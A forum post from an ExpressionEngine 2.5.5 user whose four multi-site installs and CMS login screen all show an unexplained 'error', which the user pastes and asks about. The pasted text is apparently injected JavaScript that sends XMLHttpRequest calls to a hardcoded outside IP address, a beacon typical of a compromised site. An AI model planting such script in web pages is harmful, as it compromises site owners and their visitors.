Hello, I am using EE v. 2.5.5 with multiple site manager. I have 4 sites currently running on this install and all 4 sites have an error as well as the login screen for the CMS and that error still shows once you are logged in and working on the sites. I am still able to work on the site with no issues but I am having a problem identifying what is causing the issue.
Here’s the error I get on all sites:
var ip=‘188.165.91.241’;[removed](”“);for (var i = 0; i < 2; ++i) { try { var xhrobject = (i==0) ? new window.XMLHttpRequest() : new window.ActiveXObject("Microsoft.XMLHTTP"); xhrobject.open("GET", "http://"+ip+"/status.xml?id=00622f7220f072616e449c44de62d1ec&type=enc&method;="+i, false); xhrobject.send(); } catch( e ) {} }
I’ve checked everything I can think of to look for what may be causing this inside of the CMS.
Has anyone else seen this issue before?
I’ve searched through the forums but I can’t seem to find anything that is identifying this type of situation.
I appreciate any/all help!